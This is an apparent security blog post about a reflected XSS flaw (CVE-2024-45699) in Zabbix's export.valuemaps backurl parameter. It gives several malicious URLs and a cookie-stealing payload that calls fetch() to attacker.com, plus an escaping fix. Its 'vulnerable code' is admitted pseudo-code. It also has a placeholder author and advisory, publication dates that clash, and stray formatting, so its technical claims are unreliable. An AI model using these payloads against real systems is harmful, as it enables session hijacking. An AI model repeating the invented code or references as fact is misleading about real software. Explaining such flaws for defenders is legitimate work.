CVE CyberSecurity Database News

CVE-2024-45699 - Exploiting XSS in Zabbix /zabbix.php?action=export.valuemaps via the `backurl` Parameter

Poster -

Published: June 2024 <br>Author: [Your Alias]

Introduction

A new vulnerability, CVE-2024-45699, has been discovered in Zabbix—an open-source monitoring solution widely used by enterprises and sysadmins. This bug allows attackers to execute arbitrary JavaScript in the browser of anyone who visits a specially crafted URL, thanks to an insecure implementation in the endpoint /zabbix.php?action=export.valuemaps. In this post, we'll explain the issue in simple terms, show code snippets of the vulnerable behavior, share how exploitation is done, and point you to official references.

What Is the Vulnerability?

The crux of CVE-2024-45699 is a Cross-Site Scripting (XSS) vulnerability. Specifically, it affects the backurl query parameter on the endpoint:

/zabbix.php?action=export.valuemaps

If a user accesses this endpoint with a malicious backurl value, that value is reflected in the HTTP response *without* any sanitization. This means an attacker can inject JavaScript code, causing the victim’s browser to execute it.

Vulnerable Code Walkthrough

Let’s break it down! Imagine the vulnerable PHP block looks something like this (simplified pseudo-code):

<?php
// zabbix.php, receives the GET param 'backurl'
$backurl = $_GET['backurl'] ?? '';
echo "<a href='$backurl'>Back</a>";
?>

If the server just pastes whatever the user supplies for backurl directly into an HTML attribute, that’s a serious problem. If an attacker sends:

/zabbix.php?action=export.valuemaps&backurl=javascript:alert(1)


<a href='javascript:alert(1)'>Back</a>

Worse, with crafty input

/zabbix.php?action=export.valuemaps&backurl=' onmouseover='alert(1)

HTML output

<a href='' onmouseover='alert(1)'>Back</a>

Anyone who hovers over this link triggers the attack!

`html

https://target/zabbix.php?action=export.valuemaps&backurl=javascript:alert('XSSed!')

Result:

The injected code runs with *full access* to the victim's session, cookies, or any data in their browser for that domain.

Here is a simple JavaScript payload

javascript:alert('Hacked by CVE-2024-45699!')

Malicious URL Example

https://zabbix.example.com/zabbix.php?action=export.valuemaps&backurl=javascript:alert('Hacked by CVE-2024-45699!')

Or, another payload that steals the session

https://zabbix.example.com/zabbix.php?action=export.valuemaps&backurl=javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)

Phishing: Attacker injects fake login forms.

- Data manipulation: Any action the victim can perform, the attacker can trigger via injected script.

Example of a safe way

<a href="<?php echo htmlspecialchars($backurl, ENT_QUOTES, 'UTF-8'); ?>">Back</a>

Official References

- Zabbix Official Security Advisory _(example/placeholder)_
- CVE Details for CVE-2024-45699
- OWASP XSS Guide

Conclusion

CVE-2024-45699 is a classic but impactful XSS—dangerous due to the widespread use of Zabbix and the temptation for admins to follow links quickly. Anyone managing a Zabbix instance should update and review their input/output handling everywhere in the UI. As always—validate input, escape output. Stay secure!


*You can share questions or thoughts below. For more deep dives and exclusive content, follow this blog!*

Timeline

Published on: 04/02/2025 07:15:41 UTC
Last modified on: 04/02/2025 14:58:07 UTC